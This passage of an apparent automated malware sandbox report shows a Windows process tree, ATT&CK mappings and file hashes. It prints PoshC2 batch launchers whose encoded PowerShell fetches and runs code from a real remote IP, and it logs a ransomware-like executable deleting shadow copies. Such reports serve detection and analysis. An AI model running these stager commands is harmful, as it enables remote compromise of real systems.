  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1460 /prefetch:8
  2⤵
  PID:5032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3624 /prefetch:8
  2⤵
  PID:4420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2656 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:1
  2⤵
  PID:1964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  PID:3660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5380 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4496 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\PoshC2.bat" "
  2⤵
  PID:1488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AOQA1AC4AMgAxADMALgAxADQANQAuADEAMAAxAC8AYgB1AHMAaQBuAGUAcwBzAC8AaABvAG0AZQAuAGEAcwBwACYAdgBlAGQAPQAvAF8AcgBwACcAKQApACkAOwBJAEUAWAAgACQATQBTAA==
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5588 /prefetch:8
  2⤵
  PID:3020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\poshc2_1.bat" "
  2⤵
  PID:4128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AOQA1AC4AMgAxADMALgAxADQANQAuADEAMAAxAC8AdQBhAHMAYwBsAGkAZQBuAHQALwAwAC4AMQAuADMANAAvAG0AbwBkAHUAbABlAHMALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA=
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5036 /prefetch:8
  2⤵
  PID:2184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2648 /prefetch:1
  2⤵
  PID:1180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5748 /prefetch:8
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5892 /prefetch:8
  2⤵
  PID:2428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5792 /prefetch:8
  2⤵
  PID:4992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5788 /prefetch:8
  2⤵
  PID:2176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6256 /prefetch:8
  2⤵
  PID:4864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6092 /prefetch:8
  2⤵
  PID:2856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5952 /prefetch:8
  2⤵
  PID:1828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5988 /prefetch:8
  2⤵
  PID:2036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6052 /prefetch:8
  2⤵
  PID:2772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6040 /prefetch:8
  2⤵
  PID:1924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6748 /prefetch:8
  2⤵
  PID:1400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6868 /prefetch:8
  2⤵
  PID:2280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6740 /prefetch:8
  2⤵
  PID:5032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6964 /prefetch:8
  2⤵
  PID:4148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6832 /prefetch:8
  2⤵
  PID:4088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
  2⤵
  PID:4580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2848 /prefetch:1
  2⤵
  PID:1020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
  2⤵
  PID:4912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1980 /prefetch:8
  2⤵
  PID:1880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1544 /prefetch:8
  2⤵
  PID:2168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2776 /prefetch:1
  2⤵
  PID:4036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:1
  2⤵
  PID:1332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5716 /prefetch:8
  2⤵
  PID:3216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6464 /prefetch:8
  2⤵
  PID:2388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5848 /prefetch:8
  2⤵
  PID:4332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6380 /prefetch:8
  2⤵
  PID:3632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6332 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6128 /prefetch:8
  2⤵
  PID:4580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6260 /prefetch:8
  2⤵
  PID:4296
- C:\Users\Admin\Downloads\64ME_bul9.exe
  "C:\Users\Admin\Downloads\64ME_bul9.exe"
  2⤵
  - UAC bypass
  - Executes dropped EXE
  - Modifies extensions of user files
  - Checks whether UAC is enabled
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Suspicious behavior: EnumeratesProcesses
  - System policy modification
  PID:816
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    wmic.exe SHADOWCOPY /nointeractive
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4652
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    wmic.exe SHADOWCOPY /nointeractive
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4564
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    wmic.exe SHADOWCOPY /nointeractive
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6296 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5716 /prefetch:8
  2⤵
  PID:4928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=916 /prefetch:8
  2⤵
  PID:3824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4788 /prefetch:8
  2⤵
  PID:3672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5808 /prefetch:8
  2⤵
  PID:4760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6448 /prefetch:8
  2⤵
  PID:4296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6236 /prefetch:8
  2⤵
  PID:4368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
  2⤵
  PID:3156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6304 /prefetch:8
  2⤵
  PID:3908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1696,1970069013825239872,4922715086172723196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6136 /prefetch:8
  2⤵
  PID:4020

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2952

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2748

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\PoshC2.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:1360

C:\Users\Admin\AppData\Roaming\svhost.exe
C:\Users\Admin\AppData\Roaming\svhost.exe
1⤵
- Executes dropped EXE
PID:4656

C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"
1⤵
- Drops file in Program Files directory
PID:2076
- C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2076_1790526875\ChromeRecovery.exe
  "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2076_1790526875\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={eabdf17d-3cc9-4563-b220-de87801e1a6d} --system
  2⤵
  - Executes dropped EXE
  PID:3840

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\svhost.exe

Filesize
666KB

MD5
5b780f32105ff92593db7b30ea2ac9ed

SHA1
6054922a051ce8d25d5d39565a9ad23575b7fe7f

SHA256
aa4cd5e9ff8ef8e4a72601c03154231631a5179167400a5478ca4282188b1163

SHA512
c93d9eee0cd547d513d3920f6fa5d3e22adaf6e4e7285f196ba4001d512f9ac05452e0243c526c713a880981249dbbad31947b08edf22f5eb53c6c77fb69d13d

Download Submit
C:\Users\Admin\AppData\Roaming\svhost.exe

Filesize
666KB

MD5
5b780f32105ff92593db7b30ea2ac9ed

SHA1
6054922a051ce8d25d5d39565a9ad23575b7fe7f

SHA256
aa4cd5e9ff8ef8e4a72601c03154231631a5179167400a5478ca4282188b1163

SHA512
c93d9eee0cd547d513d3920f6fa5d3e22adaf6e4e7285f196ba4001d512f9ac05452e0243c526c713a880981249dbbad31947b08edf22f5eb53c6c77fb69d13d

Download Submit
C:\Users\Admin\Downloads\64ME_bul9.exe

Filesize
666KB

MD5
5b780f32105ff92593db7b30ea2ac9ed

SHA1
6054922a051ce8d25d5d39565a9ad23575b7fe7f

SHA256
aa4cd5e9ff8ef8e4a72601c03154231631a5179167400a5478ca4282188b1163

SHA512
c93d9eee0cd547d513d3920f6fa5d3e22adaf6e4e7285f196ba4001d512f9ac05452e0243c526c713a880981249dbbad31947b08edf22f5eb53c6c77fb69d13d

Download Submit
C:\Users\Admin\Downloads\64ME_bul9.exe

Filesize
666KB

MD5
5b780f32105ff92593db7b30ea2ac9ed

SHA1
6054922a051ce8d25d5d39565a9ad23575b7fe7f

SHA256
aa4cd5e9ff8ef8e4a72601c03154231631a5179167400a5478ca4282188b1163

SHA512
c93d9eee0cd547d513d3920f6fa5d3e22adaf6e4e7285f196ba4001d512f9ac05452e0243c526c713a880981249dbbad31947b08edf22f5eb53c6c77fb69d13d

Download Submit
C:\Users\Admin\Downloads\PoshC2.bat

Filesize
784B

MD5
b2e7c4856dcf55d483242ebada3fe2b1

SHA1
c0284f5cdd55949a84f5980b647bdfc45df31025

SHA256
c8606469227b4753387daac9d45ddeb233f4149d11a5e361284ca6c3c5280bc6

SHA512
ead4f226165d2015ada44e505e5113c7c0fb6cb830b6f7bce3d85067fe2cf8462c4e9354bb9f97260f8b1d075ce9d628edfb191f23058d60605daf559e8406a6

Download Submit
C:\Users\Admin\Downloads\poshc2_1.bat

Filesize
788B

MD5
96f8a516919536f8f3da32bc5eb58bda

SHA1
7e13fa91b8085fa48269475e413c22e55716f59e

SHA256
56b823c64968f9eb87a57b688e569eb7040501f291be4606cb226ff281eaffb4

SHA512
464ddfec07671b295ee3dcfe44c48c428fde6f6c02548a3d9ede77c5f1e7d59c23b018faaf5bfc1eb1f10aa34674a3c329529d585b84b08e30d397c72c76dbc3

Download Submit
memory/4228-138-0x00007FFF75CE0000-0x00007FFF767A1000-memory.dmp

Filesize
10.8MB

Download
memory/4228-137-0x00007FFF75CE0000-0x00007FFF767A1000-memory.dmp

Filesize
10.8MB

Download
memory/4228-136-0x000001D68BCC0000-0x000001D68BCE2000-memory.dmp

Filesize
136KB

Download
memory/4392-142-0x00007FFF75CE0000-0x00007FFF767A1000-memory.dmp

Filesize
10.8MB

Download
memory/4392-143-0x00007FFF75CE0000-0x00007FFF767A1000-memory.dmp

Filesize
10.8MB

Download